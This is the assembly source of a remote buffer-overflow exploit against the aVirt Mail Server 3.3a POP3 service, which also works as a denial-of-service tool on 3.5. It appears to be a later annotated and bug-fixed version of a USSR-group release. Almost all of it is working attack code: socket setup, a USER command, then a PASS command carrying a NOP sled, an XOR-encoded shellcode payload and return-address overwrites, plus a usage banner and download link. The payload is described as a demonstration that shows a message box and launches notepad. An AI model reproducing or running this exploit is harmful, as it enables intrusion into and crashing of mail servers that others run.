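;========================================================================
; This is the source code of Avirt 3.3a Buffer oVerflow                 =
; or Avirt 3.5 D.O.S                                                    =
; Source by: Luck Martins , USSR                                        =
; www.ussrback.com                                                      =
;                                                                       =
;Recomendation: dont read this Source :), or you can get Crazzzy!!!     =
;========================================================================
;
; Syntax / ABI: TASM (Intel operand order), 32-bit flat model, Win32
; stdcall imports -- arguments are pushed right-to-left and the callee
; pops them, so no stack adjustment follows the calls below.
;
; What the tool does, as written below: connects to TCP port 110 (POP3)
; on the host given as the only command-line argument, reads the banner,
; sends "USER itsme", reads the reply, then sends sploit_code -- a POP3
; PASS command whose argument carries the overflow payload.
;
; Review fixes relative to the original listing:
;   * the host argument was copied with "rep movsb" using the whole
;     remaining command-line length into the 256-byte hostParamether,
;     so a long argument overflowed the exploit tool itself; the copy is
;     now bounded and always NUL-terminated;
;   * the "skip a leading blank" check compared against 20 (decimal, not
;     20h) and advanced SI instead of ESI;
;   * the WSAdata struct was 396 bytes, but WSAStartup fills a 400-byte
;     WSADATA (lpVendorInfo is a 4-byte pointer on a 4-byte boundary);
;   * WSAStartup, socket, inet_addr, recv and send results are checked
;     and reported instead of being ignored.
; Write_Console is a macro from code.inc, which is not part of this
; listing; it takes no operands, so what each expansion prints is decided
; inside the macro.  Its expansions are kept at the same places and in
; the same order as in the original listing.
;
.386p
locals
jumps
.model flat, stdcall

                extrn   GetCommandLineA:PROC
                extrn   GetStdHandle:PROC
                extrn   WriteConsoleA:PROC
                extrn   ExitProcess:PROC
                extrn   WSAStartup:PROC
                extrn   connect:PROC
                extrn   send:PROC
                extrn   recv:PROC
                extrn   WSACleanup:PROC
                extrn   htons:PROC
                extrn   socket:PROC
                extrn   inet_addr:PROC
                extrn   closesocket:PROC
                Extrn   GetModuleHandleA : PROC
                Extrn   GetProcAddress : PROC
                Extrn   lstrlenA : PROC

STD_OUTPUT_HANDLE equ -11               ; GetStdHandle(STD_OUTPUT_HANDLE)
WINSOCK_VER     equ 0101h               ; Winsock 1.1, as the original requested
AF_INET         equ 2
SOCK_STREAM     equ 1
INVALID_SOCKET  equ -1
SOCKET_ERROR    equ -1
INADDR_NONE     equ -1                  ; inet_addr() failure value
POP3_PORT       equ 110                 ; the Avirt service being attacked
HOST_BUF_LEN    equ 256                 ; size of hostParamether incl. terminator
RECV_MAX        equ 1000                ; bytes requested per recv()

.data

; The POP3 "PASS " command followed by the overflow payload.  The notes
; below are hand-decoded from the bytes; confirm with a disassembler
; before relying on them:
;   80,65,83,83,32                  "PASS "
;   8B F1 / 66 81 EE 90 02          mov esi,ecx / sub si,290h  -> payload address,
;                                   derived from ECX at the moment of the hijack
;   B0 30 / 33 C9 / 66 B9 47 02     mov al,30h / xor ecx,ecx / mov cx,247h
;   66 31 06 / 66 46 / E2 F9        xor [esi],ax / inc si / loop -> XOR-30h decoder
;   90,90,...                       a run of NOPs (sled)
;   ...                             the XOR-30h-encoded payload: XORing these bytes
;                                   with 30h yields the strings KERNEL32.dll,
;                                   GetProcAddress, USER32.DLL, LoadLibraryA,
;                                   MessageBoxA, WinExec, CreateThread,
;                                   \Windows\notepad.exe, "You Are Exploited."
;                                   and "Patch this program please" -- i.e. a
;                                   demonstration payload, not a shell
;   00 C1 04 00 (three times)       presumably the saved-return overwrite
;                                   (0004C100h little-endian); if so the payload
;                                   only works against the exact Avirt build the
;                                   address was taken from (other builds: the
;                                   "3.5 D.O.S" of the title, a plain crash)
;   BE 20 20 20 20 ... E2 F7        a second decoder loop (cs:[si] form)
sploit_code label byte
                DB 80,65,83,83,32                                       ; "PASS "
                DB 139,241,102,129,238,144,2,176,48,51,201,102,185,71,2 ; decoder stub
                DB 102,49,6,102,70,226,249                              ; decoder loop
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
                DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,216,48,48
                DB 48,48,109,177,221,21,32,112,48,177,244,48,51,48,48,3,240,3,235,3
                DB 198,3,207,3,226,3,249,188,248,152,52,69,62,187,181,166,33,112,48,187
                DB 173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112,48,219
                DB 60,106,106,106,106,106,106,106,106,106,106,106,106,189,189,170,33,112,48,97
                DB 96,207,227,185,181,153,33,112,48,188,248,152,52,69,62,187,181,166,33,112
                DB 48,187,173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112
                DB 48,189,189,244,33,112,48,97,96,207,227,185,181,225,33,112,48,189,181,133
                DB 33,112,48,96,207,165,225,33,112,48,185,181,240,33,112,48,189,189,229,33
                DB 112,48,97,207,133,240,33,112,48,207,165,153,33,112,48,185,181,209,33,112
                DB 48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162,33,112
                DB 48,189,189,213,33,112,48,97,96,207,165,153,33,112,48,185,181,221,33,112
                DB 48,219,48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162
                DB 33,112,48,189,189,193,33,112,48,97,96,207,165,153,33,112,48,185,181,206
                DB 33,112,48,189,181,50,34,112,48,96,90,48,90,48,189,181,122,33,112,48
                DB 96,90,48,90,48,187,181,206,33,112,48,207,224,219,206,80,216,48,48,48
                DB 48,109,177,221,96,33,112,48,88,32,48,52,48,189,173,43,34,112,48,99
                DB 189,173,30,34,112,48,99,90,48,207,165,209,33,112,48,90,51,189,133,54
                DB 34,112,48,102,207,165,221,33,112,48,81,242,32,48,123,117,98,126,117,124
                DB 3,2,30,84,92,92,48,48,48,199,143,48,48,192,71,119,85,68,96,66
                DB 95,83,113,84,84,66,85,67,67,48,48,48,48,48,152,93,199,143,32,112
                DB 193,71,101,99,117,98,3,2,30,116,124,124,48,48,48,48,48,124,95,81
                DB 84,124,89,82,66,81,66,73,113,48,48,48,48,48,125,85,67,67,81,87
                DB 85,114,95,72,113,48,48,48,48,48,103,89,94,117,72,85,83,48,48,48
                DB 48,48,115,66,85,81,68,85,100,88,66,85,81,84,48,48,48,48,48,48
                DB 48,48,48,108,71,89,94,84,95,71,67,108,94,95,68,85,64,81,84,30
                DB 85,72,85,48,105,95,69,16,113,66,85,16,117,72,64,92,95,89,68,85
                DB 84,30,48,96,81,68,83,88,16,68,88,89,67,16,64,66,95,87,66,81
                DB 93,16,64,92,85,81,67,85,30,30,30,30,30,30,30,48,48,48,48,48
                DB 48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,176,222,84
                DB 1,97,33,97,97,97,97,97,97,97,97,97,97,97,97,97,97,0,193,4
                DB 0,0,193,4,0,0,193,4,0,190,32,32,32,32,176,48,102,185,71,2
                DB 102,46,103,49,4,102,70,226,247,0,1,84,222,176
sploit_code_length equ $-sploit_code

; POP3 USER command sent first; its reply is read before PASS goes out.
senduser        db 'USER itsme',13,10
senduserl       equ $-senduser

; Banner / usage text (kept byte-for-byte; note the example address has an
; out-of-range octet, "488", so it is not something you can copy-paste).
Copy            db "aVirt Mail Server 3.3a Remote Oveflow.", 13, 10
                db "or aVirt Mail Server 3.5 Denial of Service", 13, 10
                db "by: Luck Martins, Ussr",13,10
                db "for source code or binary go to: http://www.ussrback.com/avirtro",13,10,13,10
                db "Usage: AvirtExp HostIp", 13, 10
                db "Example: AvirtExp 205.488.47.6",13,10,0
Copyl           equ $-Copy

wsadescription_len equ 256
wsasys_status_len  equ 128

; Layout of the Win32 WSADATA that WSAStartup fills in: 400 bytes.
WSAdata         struct
 wVersion       dw ?
 wHighVersion   dw ?
 szDescription  db wsadescription_len+1 dup (?)
 szSystemStatus db wsasys_status_len+1 dup (?)
 iMaxSockets    dw ?
 iMaxUdpDg      dw ?
 wPad           dw ?                    ; lpVendorInfo sits on a 4-byte boundary
 lpVendorInfo   dd ?                    ; char FAR *: 4 bytes (the original had dw)
WSAdata         ends

sockaddr_in     struct
 sin_family     dw ?
 sin_port       dw ?                    ; network byte order (htons)
 sin_addr       dd ?                    ; as returned by inet_addr
 sin_zero       db 8 dup (0)
sockaddr_in     ends

wsadata         WSAdata <>
sin             sockaddr_in <>
sock            dd ?
numbase         dd 10                   ; unused here; kept for code.inc
hostParamether  db HOST_BUF_LEN dup (?) ; host argument, NUL-terminated by the parser
; Both buffers are zero-filled and 4000 bytes long while recv() is asked for at
; most RECV_MAX bytes, so lstrlenA on them always hits a NUL inside the buffer.
buffer          dd 1000 dup (0)
buffer2         dd 1000 dup (0)

i_cant_connect  db 'fata: sorry i can',27h,'t connect to this host!',13,10
i_cant_connectl equ $-i_cant_connect
SendingExploit  db 'ok!: Sending exploit code....',13,10
SendingExploitl equ $-SendingExploit

; Messages for the error paths added in review (printed by print_msg).
e_wsa           db 'error: WSAStartup failed',13,10
e_wsal          equ $-e_wsa
e_socket        db 'error: socket() failed',13,10
e_socketl       equ $-e_socket
e_badaddr       db 'error: host must be a dotted-decimal IPv4 address',13,10
e_badaddrl      equ $-e_badaddr
e_recv          db 'error: no reply from the server (closed or recv failed)',13,10
e_recvl         equ $-e_recv
e_send          db 'error: send failed',13,10
e_sendl         equ $-e_send
e_short         db 'error: the exploit buffer was only partly sent',13,10
e_shortl        equ $-e_short

include code.inc

cchWritten      dd 0                    ; WriteConsoleA's "chars written" output
ConHandle       dd 0                    ; STD_OUTPUT_HANDLE, set at start

.code
start:
                xor     eax, eax
                xor     ebx, ebx
                xor     edx, edx
                xor     ecx, ecx
                xor     esi, esi
                xor     edi, edi
                xor     ebp, ebp

                push    STD_OUTPUT_HANDLE
                call    GetStdHandle
                mov     [ConHandle], eax

;--- command line: "<program> <host>" -----------------------------------
; GetCommandLineA returns the whole line including the program name, which
; may be quoted (and then may itself contain blanks).
                call    GetCommandLineA
                mov     esi, eax                ; esi -> NUL-terminated command line
                cmp     byte ptr [esi], '"'
                jne     skip_program_name
                inc     esi                     ; quoted name: ends at the closing quote
find_close_quote:
                lodsb
                test    al, al
                jz      no_command_line         ; unterminated quote, no argument
                cmp     al, '"'
                jne     find_close_quote
                jmp     skip_blanks
skip_program_name:                              ; unquoted name: ends at the first blank
                lodsb
                test    al, al
                jz      no_command_line         ; only the program name was given
                cmp     al, ' '
                jne     skip_program_name
skip_blanks:
                cmp     byte ptr [esi], ' '
                jne     check_host_present
                inc     esi
                jmp     skip_blanks
check_host_present:
                cmp     byte ptr [esi], 0
                je      no_command_line
                lea     edi, hostParamether
                mov     ecx, HOST_BUF_LEN-1     ; one byte is reserved for the NUL
copy_host_byte:                                 ; copy up to the next blank / NUL / limit
                lodsb
                test    al, al
                jz      host_copied
                cmp     al, ' '
                je      host_copied
                stosb
                dec     ecx
                jnz     copy_host_byte
host_copied:
                mov     byte ptr [edi], 0       ; always terminated; excess bytes are dropped
                                                ; (inet_addr then rejects the truncated text)

;--- Winsock setup and connect ------------------------------------------
                push    offset wsadata
                push    WINSOCK_VER
                call    WSAStartup
                test    eax, eax                ; non-zero = error code; nothing to clean up
                jnz     wsa_failed

                push    0                       ; protocol: default for SOCK_STREAM
                push    SOCK_STREAM
                push    AF_INET
                call    socket
                cmp     eax, INVALID_SOCKET
                je      socket_failed
                mov     sock, eax

                mov     sin.sin_family, AF_INET
                push    POP3_PORT
                call    htons
                mov     sin.sin_port, ax

                push    offset hostParamether
                call    inet_addr               ; dotted-decimal only; no name resolution
                cmp     eax, INADDR_NONE
                je      bad_address             ; was reported as "can't connect" before
                mov     sin.sin_addr, eax

                push    size sin
                push    offset sin
                push    sock
                call    connect
                or      eax, eax                ; connect returns 0 on success
                jz      connectionworking
                Write_Console                   ; code.inc macro, kept at its original place
                jmp     the_end

;--- POP3 dialogue: banner, USER, reply, then PASS + payload -------------
connectionworking:
                push    0
                push    RECV_MAX
                push    offset buffer
                push    sock
                call    recv
                test    eax, eax                ; 0 = peer closed, SOCKET_ERROR = failure
                jle     recv_failed
                push    offset buffer           ; eax = banner length (buffer is NUL-padded)
                call    lstrlenA
                Write_Console                   ; code.inc macro, kept at its original place
                Write_Console                   ; code.inc macro, kept at its original place

                push    0
                push    senduserl
                push    offset senduser
                push    sock
                call    send
                cmp     eax, SOCKET_ERROR
                je      send_failed

                push    0
                push    RECV_MAX
                push    offset buffer2
                push    sock
                call    recv
                test    eax, eax
                jle     recv_failed
                push    offset buffer           ; NOTE(review): the reply is in buffer2, but
                call    lstrlenA                ; the original measured buffer here; left as
                Write_Console                   ; is because what Write_Console prints (and
                                                ; which registers it reads) lives in code.inc
                                                ; -- confirm before switching this to buffer2

                push    0
                push    sploit_code_length
                push    offset sploit_code
                push    sock
                call    send
                cmp     eax, SOCKET_ERROR
                je      send_failed
                cmp     eax, sploit_code_length ; a single send() may queue fewer bytes
                jne     send_short

the_end:
                push    sock
                call    closesocket
cleanup_wsa:
                call    WSACleanup
final_exit:
                push    0
                call    ExitProcess

no_command_line:
                Write_Console                   ; code.inc macro, kept at its original place
                jmp     final_exit

;--- error paths added in review: report, then release what was acquired
wsa_failed:                                     ; WSAStartup failed: no WSACleanup is due
                lea     esi, e_wsa
                mov     ecx, e_wsal
                call    print_msg
                jmp     final_exit
socket_failed:                                  ; Winsock is up, no socket to close
                lea     esi, e_socket
                mov     ecx, e_socketl
                call    print_msg
                jmp     cleanup_wsa
bad_address:
                lea     esi, e_badaddr
                mov     ecx, e_badaddrl
                call    print_msg
                jmp     the_end
recv_failed:
                lea     esi, e_recv
                mov     ecx, e_recvl
                call    print_msg
                jmp     the_end
send_failed:
                lea     esi, e_send
                mov     ecx, e_sendl
                call    print_msg
                jmp     the_end
send_short:
                lea     esi, e_short
                mov     ecx, e_shortl
                call    print_msg
                jmp     the_end

;------------------------------------------------------------------------
; print_msg: WriteConsoleA(ConHandle, esi, ecx, &cchWritten, NULL)
; In:    esi = text, ecx = byte count
; Out:   nothing useful (eax = WriteConsoleA result)
; Clobb: eax, ecx, edx (stdcall callee), flags
; Independent of the Write_Console macro so it can be used on paths the
; original listing did not have.
;------------------------------------------------------------------------
print_msg:
                push    0                       ; lpReserved
                push    offset cchWritten       ; lpNumberOfCharsWritten
                push    ecx                     ; nNumberOfCharsToWrite
                push    esi                     ; lpBuffer
                push    [ConHandle]             ; hConsoleOutput
                call    WriteConsoleA
                ret

end start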